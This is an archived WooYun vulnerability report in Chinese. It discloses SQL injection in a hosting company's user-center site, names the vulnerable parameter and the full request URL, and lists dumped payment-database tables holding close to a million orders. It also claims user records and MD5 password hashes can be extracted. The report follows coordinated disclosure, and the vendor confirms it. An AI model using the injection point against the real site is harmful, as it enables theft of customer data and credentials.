群英某系统SQL注入（涉及百万订单/用户数据/密码/可拖库）

2017年5月2日02:50:00评论369 views字数 217阅读0分43秒阅读模式

摘要

2016-04-15：细节已通知厂商并且等待厂商处理中
2016-04-15：厂商已经确认，细节仅向厂商公开
2016-04-25：细节向核心白帽子及相关领域专家公开
2016-05-05：细节向普通白帽子公开
2016-05-15：细节向实习白帽子公开
2016-05-30：细节向公众公开

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2016-196534

漏洞标题：群英某系统SQL注入（涉及百万订单/用户数据/密码/可拖库）

漏洞作者：路人甲

提交时间： 2016-04-15 11:56

公开时间： 2016-05-30 14:20

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

https://uc.qycn.com/login.php

注入参数：an_status

code 区域

GET https://uc.qycn.com/announcement.php?an_status=1&act=search&an_publish_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%8F%91%E5%B8%83%E6%97%A5%E6%9C%9F&an_end_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%BB%93%E6%9D%9F%E6%97%A5%E6%9C%9F&keyword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&type=list&submit=%E6%90%9C+%E7%B4%A2 HTTP/1.1
 Host: uc.qycn.com
 Connection: keep-alive
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
 Referer: https://uc.qycn.com/announcement.php?act=list
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: zh-CN,zh;q=0.8

dbs：

百万订单：

code 区域

Database: newqycn_pay
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | qy_order                | 996877  |
 | qy_business             | 471212  |
 | qy_order_buydetail      | 437606  |
 | qy_useraccount          | 418035  |
 | qy_order_serviceparams  | 309086  |
 | qy_order_service        | 300540  |
 | qy_account_log          | 177322  |
 | qy_order_sms            | 133378  |
 | qy_order_regdomain      | 93107   |
 | qy_pay_logs             | 83300   |
 | qy_order_domain         | 76166   |
 | qy_order_payment        | 35233   |
 | qy_order_dns            | 19719   |
 | qy_yeepay_log           | 8797    |
 | qy_paypricelog          | 3020    |
 | qy_payment_statis       | 1544    |
 | qy_order_transfer       | 799     |
 | qy_order_servicegift    | 438     |
 | qy_order_receipt        | 365     |
 | qy_manual_pay           | 317     |
 | qy_order_device         | 178     |
 | qy_order_address        | 176     |
 | qy_order_voice          | 137     |
 | qy_order_auth           | 98      |
 | qy_order_safe           | 95      |
 | qy_orderinfo            | 63      |
 | qy_order_jk             | 61      |
 | qy_safe_info            | 15      |
 | qy_order_payment_client | 9       |
 | qy_safe_checkinfo       | 7       |
 +-------------------------+---------+

百万用户记录：

可脱裤，密码为md5加密：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-15 14:13

厂商回复：

谢谢支持，我们马上安排跟进！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(2) 关注此漏洞

缺陷编号： WooYun-2016-196534

漏洞标题： 群英某系统SQL注入（涉及百万订单/用户数据/密码/可拖库）

相关厂商： qy.com.cn

漏洞作者： 路人甲

提交时间： 2016-04-15 11:56

公开时间： 2016-05-30 14:20

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 10

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(2) 关注此漏洞

漏洞标题：群英某系统SQL注入（涉及百万订单/用户数据/密码/可拖库）

漏洞作者：路人甲

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分